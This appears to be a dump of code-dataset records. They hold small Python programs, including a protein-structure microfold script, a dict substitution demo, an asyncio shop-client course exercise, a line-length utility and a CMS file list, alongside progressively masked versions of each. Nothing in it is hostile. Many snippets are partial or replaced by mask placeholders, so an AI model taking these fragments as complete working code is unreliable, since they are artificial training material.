EC='-.-.-.-'\r\n# try:\r\n# EC=comp['ec']\r\n# except KeyError:\r\n# pass\r\n# try:\r\n# EC=comp['ec_number']\r\n# except KeyError:\r\n# pass\r\n# if EC==\"\": \r\n# EC='-.-.-.-'\r\n# #print(EC)\r\n###\r\n### \r\n# \r\n# sf4ID=[]\r\n# sf4coord=[]\r\n# for model in structure:\r\n# if model.id==0:\r\n# atom_list = Selection.unfold_entities(model, 'A') # A for atoms\r\n# ns = NeighborSearch(atom_list)\r\n# lig=[]\r\n# for chain in model:\r\n# for residue in chain:\r\n# #if residue.resname not in AA and residue.resname not in CF :\r\n# #print(chain.id,residue.resname)\r\n# if residue.resname in organic_cofactors_list: \r\n# #print(chain.id,residue.resname)\r\n# atom_in_res=[]\r\n# for atom in residue:\r\n# atom_in_res.append(atom.element)\r\n# \r\n# #if any(x in Metals for x in atom_in_res)==False:\r\n# #print ('not metal')\r\n# # continue\r\n# \r\n# center = get_center(residue)\r\n# #print ('center',center)\r\n# lig=protein,chain.id,residue.id[1],residue.resname,center\r\n# #print(lig)\r\n# all_neighbors = ns.search(center, 15.0,\"R\") # 15.0 for distance in angstrom\r\n# microfold_name=protein+'.'+residue.resname+'_'+ chain.id +'_'+str(residue.id[1])+'_'+head+'_'+EC\r\n# microfold_name=microfold_name.replace(' ','')\r\n# microfold_name=microfold_name.replace('/','_')\r\n# microfold_dir=residue.resname\r\n# microfold_dir=microfold_dir.replace(' ','')\r\n# # print(microfold_name)\r\n# if not os.path.exists('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir):\r\n# os.makedirs('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir)\r\n# Select = Bio.PDB.Select\r\n# class MicroSelect(Select):\r\n# def accept_residue(self, residue):\r\n# if residue in all_neighbors and residue.resname!='HOH':\r\n# return 1\r\n# else:\r\n# return 0\r\n# io=PDBIO()\r\n# io.set_structure(structure)\r\n# #print('/home/hraanan/MicrofoldsPDBs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect()) \r\n# io.save('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect())\r\n except:\r\n# e = sys.exc_info()[0]\r\n Error_out.write('xxx\\n')\r\n Error_out.write('/n' )\r\n Error_out.write( \"<p>Error: %s</p>\" )\r\n Error_out.write('xxx\\n')\r\n print('err')\r\n continue\r\n \r\n \r\nError_out.close()\r\n#prot.close()\r\nprint(\"end\")\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
<|reserved_special_token_1|>
dict1 = [{'a': 1}, {'a': 2}, {'a': 3}]
a = dict1[1]['a']
correlation_dict = {'${class_id}': 123}
data = {'token': '${self.token}', 'name': 'api测试', 'class_id': '${class_id}'}
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
<|reserved_special_token_1|>
dict1 = [
{'a':1},
{'a':2},
{'a':3}
]
a = dict1[1]['a']
# print(a)
correlation_dict = {'${class_id}':123}
data = {'token': '${self.token}', 'name': 'api测试','class_id': '${class_id}'}
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
|
flexible
|
{
"blob_id": "9c05b39a12ab29db99397e62315efddd8cdf1df4",
"index": 456,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor k in data:\n for key in correlation_dict:\n if data[k] in key:\n data[k] = correlation_dict[key]\nprint(data)\n",
"step-3": "dict1 = [{'a': 1}, {'a': 2}, {'a': 3}]\na = dict1[1]['a']\ncorrelation_dict = {'${class_id}': 123}\ndata = {'token': '${self.token}', 'name': 'api测试', 'class_id': '${class_id}'}\nfor k in data:\n for key in correlation_dict:\n if data[k] in key:\n data[k] = correlation_dict[key]\nprint(data)\n",
"step-4": "dict1 = [\n {'a':1},\n {'a':2},\n {'a':3}\n]\n\na = dict1[1]['a']\n# print(a)\n\ncorrelation_dict = {'${class_id}':123}\n\ndata = {'token': '${self.token}', 'name': 'api测试','class_id': '${class_id}'}\n\nfor k in data:\n for key in correlation_dict:\n if data[k] in key:\n data[k] = correlation_dict[key]\nprint(data)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
mlt = 1
mlt_sum = 0
num_sum = 0
for i in range(1,101):
mlt = (i ** 2)
mlt_sum += mlt
num_sum += i
print((num_sum ** 2) - mlt_sum)
|
normal
|
{
"blob_id": "6f877dccab8d62e34b105bbd06027cbff936e3aa",
"index": 6885,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(1, 101):\n mlt = i ** 2\n mlt_sum += mlt\n num_sum += i\nprint(num_sum ** 2 - mlt_sum)\n",
"step-3": "mlt = 1\nmlt_sum = 0\nnum_sum = 0\nfor i in range(1, 101):\n mlt = i ** 2\n mlt_sum += mlt\n num_sum += i\nprint(num_sum ** 2 - mlt_sum)\n",
"step-4": "mlt = 1\nmlt_sum = 0\nnum_sum = 0\nfor i in range(1,101):\n mlt = (i ** 2)\n mlt_sum += mlt\n num_sum += i\nprint((num_sum ** 2) - mlt_sum)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print('ShopClient Data_received is called')
self.deserializer.update(data)
for pkt in self.deserializer.nextPackets():
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
item = 'Butter'
response = SendItem()
response.Item = item
print('Sent SendItem')
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
response = SendMoney()
response.Cash = pkt.Amount
print('Sent SendMoney')
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print(
'Client Received Incorrect Packet. Closing Connection. Try Again!'
)
self.transport.close()
def connection_lost(self, exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print('ShopClient Data_received is called')
self.deserializer.update(data)
for pkt in self.deserializer.nextPackets():
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
item = 'Butter'
response = SendItem()
response.Item = item
print('Sent SendItem')
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
response = SendMoney()
response.Cash = pkt.Amount
print('Sent SendMoney')
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print(
'Client Received Incorrect Packet. Closing Connection. Try Again!'
)
self.transport.close()
def connection_lost(self, exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print('ShopClient connection_made is called\n')
self.transport = transport
startbuy = RequestToBuy()
print('Sending Request to Buy')
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print('ShopClient Data_received is called')
self.deserializer.update(data)
for pkt in self.deserializer.nextPackets():
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
item = 'Butter'
response = SendItem()
response.Item = item
print('Sent SendItem')
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
response = SendMoney()
response.Cash = pkt.Amount
print('Sent SendMoney')
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print(
'Client Received Incorrect Packet. Closing Connection. Try Again!'
)
self.transport.close()
def connection_lost(self, exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate:
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)
)
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector('passthrough', ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(
go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
loop.close()
<|reserved_special_token_1|>
from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney
from netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport
from netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient
import asyncio
import playground
import random, logging
from playground import getConnector
from playground.network.packet import PacketType
from playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER
from playground.network.packet.fieldtypes.attributes import Optional
from playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport
import zlib
import sys
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
#self.loop = loop
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print("ShopClient connection_made is called\n")
self.transport = transport
# PACKET 1 - Request to Buy packet
startbuy = RequestToBuy()
print("Sending Request to Buy")
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print("ShopClient Data_received is called")
self.deserializer.update(data)
#print(data)
for pkt in self.deserializer.nextPackets():
#print("Client <------------{}------------- Server".format(pkt.DEFINITION_IDENTIFIER))
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
# PACKET 3 - Send Item packet
item = "Butter"
response = SendItem()
response.Item = item
print("Sent SendItem")
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
# PACKET 5 - Send Money packet
response = SendMoney()
response.Cash = pkt.Amount
print("Sent SendMoney")
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print("Client Received Incorrect Packet. Closing Connection. Try Again!")
self.transport.close()
def connection_lost(self,exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate():
#1
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
#logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*
#logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr
f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector("passthrough", ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
loop.close()
|
flexible
|
{
"blob_id": "a12f9435eb4b090bc73be14ad64fdf43c5caa4d2",
"index": 7471,
"step-1": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n <mask token>\n <mask token>\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)\n )\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector('passthrough', ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(\n go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n loop.close()\n",
"step-5": "from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney\nfrom netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport\nfrom netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient\nimport asyncio\nimport playground\nimport random, logging\nfrom playground import getConnector\nfrom playground.network.packet import PacketType\nfrom playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER\nfrom playground.network.packet.fieldtypes.attributes import Optional\nfrom playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport\nimport zlib\nimport sys\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n\n clientstate = 0\n\n def __init__(self, loop):\n #self.loop = loop\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print(\"ShopClient connection_made is called\\n\")\n self.transport = transport\n # PACKET 1 - Request to Buy packet\n startbuy = RequestToBuy()\n print(\"Sending Request to Buy\")\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print(\"ShopClient Data_received is called\")\n self.deserializer.update(data)\n #print(data)\n for pkt in self.deserializer.nextPackets():\n #print(\"Client <------------{}------------- Server\".format(pkt.DEFINITION_IDENTIFIER))\n\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n\n # PACKET 3 - Send Item packet\n item = \"Butter\"\n response = SendItem()\n response.Item = item\n\n print(\"Sent SendItem\")\n self.transport.write(response.__serialize__())\n\n\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n\n # PACKET 5 - Send Money packet\n response = SendMoney()\n\n response.Cash = pkt.Amount\n\n print(\"Sent SendMoney\")\n self.transport.write(response.__serialize__())\n\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n\n self.transport.close()\n\n else:\n print(pkt.Type)\n print(\"Client Received Incorrect Packet. Closing Connection. Try Again!\")\n self.transport.close()\n\n\n def connection_lost(self,exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate():\n #1\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\nif __name__ == \"__main__\":\n\n loop = asyncio.get_event_loop()\n\n #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*\n #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr\n\n f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector(\"passthrough\", ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n # Close the server\n loop.close()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
#!/usr/bin/env python3
import sys
from pathlib import Path
def print_usage():
sys.stderr.write('''
Find the length of the biggest line in the file.
Usage: ./biggestLine <delimiter> <field number - first element is 0> <file path>
''')
def main():
if len(sys.argv) != 4:
print_usage()
sys.exit(1)
delimiter = sys.argv[1]
field_number = int(sys.argv[2])
file_path = sys.argv[3]
my_file = Path(file_path)
biggest_string = ""
try:
with open(my_file, 'r') as f:
line = f.readline()
line_num = 0
while line:
line_num = line_num + 1
line = f.readline()
curr = line.split(delimiter)[field_number]
if len(curr) > len(biggest_string):
biggest_string = curr
print('Processing Line ' + str(line_num), end='\r')
except IndexError:
print('\nError on line '+str(line_num))
except KeyboardInterrupt:
sys.exit(0)
except FileNotFoundError:
sys.stderr.write('file not found')
sys.exit(1)
print("biggest string is " + str(len(biggest_string)) + " characters")
main()
|
normal
|
{
"blob_id": "c84175edb88f5b9219c22ec717ec30bb530982a2",
"index": 2861,
"step-1": "<mask token>\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n my_file = Path(file_path)\n biggest_string = ''\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line ' + str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n print('biggest string is ' + str(len(biggest_string)) + ' characters')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n my_file = Path(file_path)\n biggest_string = ''\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line ' + str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n print('biggest string is ' + str(len(biggest_string)) + ' characters')\n\n\nmain()\n",
"step-4": "import sys\nfrom pathlib import Path\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n my_file = Path(file_path)\n biggest_string = ''\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line ' + str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n print('biggest string is ' + str(len(biggest_string)) + ' characters')\n\n\nmain()\n",
"step-5": "#!/usr/bin/env python3\nimport sys\nfrom pathlib import Path\n\n\ndef print_usage():\n sys.stderr.write('''\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n ''')\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n\n my_file = Path(file_path)\n\n biggest_string = \"\"\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line '+str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n\n print(\"biggest string is \" + str(len(biggest_string)) + \" characters\")\n\n\nmain()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
prompt = "Enter a message and I will repeat it to you: "
message = " "
while message != 'quit':
message = input(prompt)
if message != 'quit':
print(message)
# using the 'flag' variable
prompt = "Enter a message and I will repeat it to you: "
# active is the variable used in this case as flag
active = True
while active:
message = input(prompt)
if message == 'quit':
active = False
else:
print(message)
|
normal
|
{
"blob_id": "1a6f84835ec2f5fbbb064aef2cd872c24eb3839d",
"index": 8717,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile message != 'quit':\n message = input(prompt)\n if message != 'quit':\n print(message)\n<mask token>\nwhile active:\n message = input(prompt)\n if message == 'quit':\n active = False\n else:\n print(message)\n",
"step-3": "prompt = 'Enter a message and I will repeat it to you: '\nmessage = ' '\nwhile message != 'quit':\n message = input(prompt)\n if message != 'quit':\n print(message)\nprompt = 'Enter a message and I will repeat it to you: '\nactive = True\nwhile active:\n message = input(prompt)\n if message == 'quit':\n active = False\n else:\n print(message)\n",
"step-4": "prompt = \"Enter a message and I will repeat it to you: \"\n\nmessage = \" \"\n\nwhile message != 'quit':\n message = input(prompt)\n if message != 'quit':\n print(message)\n\n# using the 'flag' variable\n\nprompt = \"Enter a message and I will repeat it to you: \"\n\n# active is the variable used in this case as flag\n\nactive = True\n\nwhile active:\n message = input(prompt)\n \n if message == 'quit':\n active = False\n else:\n print(message)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
source = cms.Source('PoolSource', fileNames=cms.untracked.vstring(
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'
,
